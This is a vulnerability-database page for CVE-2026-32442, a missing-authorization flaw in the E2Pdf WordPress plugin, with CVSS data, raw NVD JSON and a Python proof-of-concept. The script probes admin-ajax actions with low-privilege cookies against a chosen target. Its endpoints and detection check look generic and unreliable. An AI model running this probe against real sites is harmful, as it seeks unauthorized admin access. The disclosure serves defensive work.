Security Vulnerability Report
中文
CVE-2026-32442 CVSS 5.0 MEDIUM

CVE-2026-32442

Published: 2026-03-13 19:55:05
Last Modified: 2026-04-29 10:17:11

Description

Missing Authorization vulnerability in E2Pdf e2pdf e2pdf allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects e2pdf: from n/a through <= 1.28.15.

CVSS Details

CVSS Score
5.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

E2Pdf e2pdf <= 1.28.15 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-32442 PoC - Missing Authorization in E2Pdf Plugin # Target: WordPress site with E2Pdf plugin <= 1.28.15 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2026-32442 This PoC attempts to access admin functions with low-privilege user """ # Target endpoint that should require admin privileges endpoints = [ '/wp-admin/admin-ajax.php?action=e2pdf_load', '/wp-admin/admin-ajax.php?action=e2pdf_save', '/wp-admin/admin-ajax.php?action=e2pdf_delete' ] # Low-privilege user session (attacker needs valid low-priv account) cookies = { 'wordpress_test_cookie': 'WP+Cookie+check', # Add valid low-privilege user cookies here } print(f'[*] Testing target: {target_url}') print(f'[*] CVE-2026-32442 - E2Pdf Missing Authorization') for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, cookies=cookies, timeout=10) # Check if response indicates successful unauthorized access if response.status_code == 200 and 'e2pdf' in response.text.lower(): print(f'[+] VULNERABLE: {endpoint}') print(f' Response length: {len(response.text)} bytes') else: print(f'[-] Not vulnerable or protected: {endpoint}') except requests.exceptions.RequestException as e: print(f'[-] Error testing {endpoint}: {str(e)}') if __name__ == '__main__': if len(sys.argv) < 2: print(f'Usage: python {sys.argv[0]} <target_url>') print(f'Example: python {sys.argv[0]} http://target.com') sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32442", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:55:04.683", "lastModified": "2026-04-29T10:17:11.007", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in E2Pdf e2pdf e2pdf allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects e2pdf: from n/a through <= 1.28.15."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en E2Pdf e2pdf e2pdf permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a e2pdf: desde n/a hasta &lt;= 1.28.15."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/e2pdf/vulnerability/wordpress-e2pdf-plugin-1-28-15-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}